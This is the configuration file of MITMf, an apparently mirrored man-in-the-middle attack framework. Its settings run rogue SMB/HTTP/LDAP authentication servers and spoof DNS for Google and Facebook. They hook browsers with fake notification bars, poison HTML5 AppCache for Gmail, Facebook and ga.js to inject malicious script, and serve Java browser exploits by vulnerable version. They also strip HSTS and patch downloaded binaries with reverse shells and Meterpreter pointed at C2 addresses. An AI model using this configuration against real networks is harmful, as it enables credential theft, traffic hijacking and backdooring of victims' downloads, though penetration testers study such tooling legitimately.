github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-03-12 04:35:49 -07:00
Code Issues Packages Projects Releases Wiki Activity
MITMf/config/mitmf.cfg
byt3bl33d3r 0c57f39671 -Fixed bug in App Cache Poison plugin, missing function call resulted in some websites not loading 
-Added output to the AppCachePoison plugin
2015-03-15 16:42:17 +01:00

359 lines
12 KiB
INI
Raw Permalink Blame History

#MITMf configuration
[MITMf]
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py```
#(assuming you config file is in the default directory)
args=''
#Required BeEF and Metasploit options
[[BeEF]]
beefip = 127.0.0.1
beefport = 3000
user = beef
pass = beef
[[Metasploit]]
msfport = 8080 #Port to start webserver for exploits
rpcip = 127.0.0.1
rpcpass = abc123
#-----------------------------------------------------------------------------------------------------------------------------------------#
#Plugin configuration starts here
[Spoof]
[[DHCP]]
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional
[[DNS]]
www.facebook.com = 192.168.10.1
google.com = 192.168.10.1
[Responder]
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
##Listen on 25/TCP, 587/TCP
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
#Set a custom challenge
Challenge = 1122334455667788
#Set this to change the default logging file
SessionLog = Responder-Session.log
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
#RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName =
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
[[HTTP Server]]
#Set this to On if you want to always serve a specific file to the victim.
Serve-Always = Off
#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
#Uncomment and specify a custom file to serve, the file must exist.
Filename = config/responder/Denied.html
#Specify a custom executable file to serve, the file must exist.
ExecFilename = config/responder/FixInternet.exe
#Set your custom PAC script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
[[HTTPS Server]]
#Change to use your certs
cert = config/responder/certs/responder.crt
key = config/responder/certs/responder.key
[BeEFAutorun]
#Example config for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[[ALL]] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[[targets]] #Runs specified modules based on OS and Browser type
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
[[[[FF]]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[[IE]]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[[Windows 7]]] #Target only Windows 7 using Chrome
[[[[C]]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
[[[Linux]]] #Target Linux platforms using Chrome
[[[[C]]]]
'Redirect Browser (Rickroll)' = '{}'
[AppCachePoison]
# HTML5 AppCache poisioning attack
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
# generic settings for tampering engine
#enable_only_in_useragents=Chrome|Firefox
templates_path=config/app_cache_poison_templates
# when visiting first url matching following expression we will embed iframes with all tamper URLs
#(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
# it's only useful to mass poison chrome because:
# - it supports iframe sandbox preventing framebusting
# - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[[test]]
# any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test # which templates to use for spoofing content?
skip_in_mass_poison=1
[[gmail]]
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
tamper_url=http://mail.google.com/mail/
# manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default # could be omitted
[[google]]
tamper_url = http://www.google.com/
manifest_url = http://www.google.com/robots.txt
[[facebook]]
tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt
templates=facebook # use different template
[[twitter]]
tamper_url=http://twitter.com/
#tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[[html5rocks]]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
[[ga]]
# we can also modify non-HTML URLs to append malicious code to them
# but for them to be cached in HTML5 AppCache they need to be referred in
# manifest for a poisoned domain
# if not, they are "only" cached for 10 years :D
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
[JavaPwn]
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
[[Multi]] #Cross platform exploits, yay java! <3
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
multi/browser/java_jre17_exec = 1.7.0.6
multi/browser/java_jre17_jaxws = 1.7.0.7
multi/browser/java_jre17_jmxbean = 1.7.0.10
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
multi/browser/java_jre17_reflection_types = 1.7.0.17
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
multi/browser/java_jre17_method_handle = 1.7.0.7
multi/browser/java_jre17_driver_manager = 1.7.0.17
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
multi/browser/java_storeimagearray = 1.7.0.21
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
[[Windows]] #These are windows specific
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
windows/browser/java_mixer_sequencer = 1.6.0.18
[SSLstrip+]
#here you can configure your domains to bypass HSTS on
#the format is real.domain.com = fake.domain.com
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
facebook.com = social.facebook.com
#-----------------------------------------------------------------------------------------------------------------------------------------#
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
#-----------------------------------------------------------------------------------------------------------------------------------------#
[FilePwn]
[[ZIP]]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[[TAR]]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = , # a comma is null do not leave blank
[[targets]]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[[LinuxIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8443
SHELL = reverse_tcp_stager
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/meterpreter/reverse_tcp
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp
[[[[MachoIntelx86]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[MachoIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
Reference in New Issue View Git Blame Copy Permalink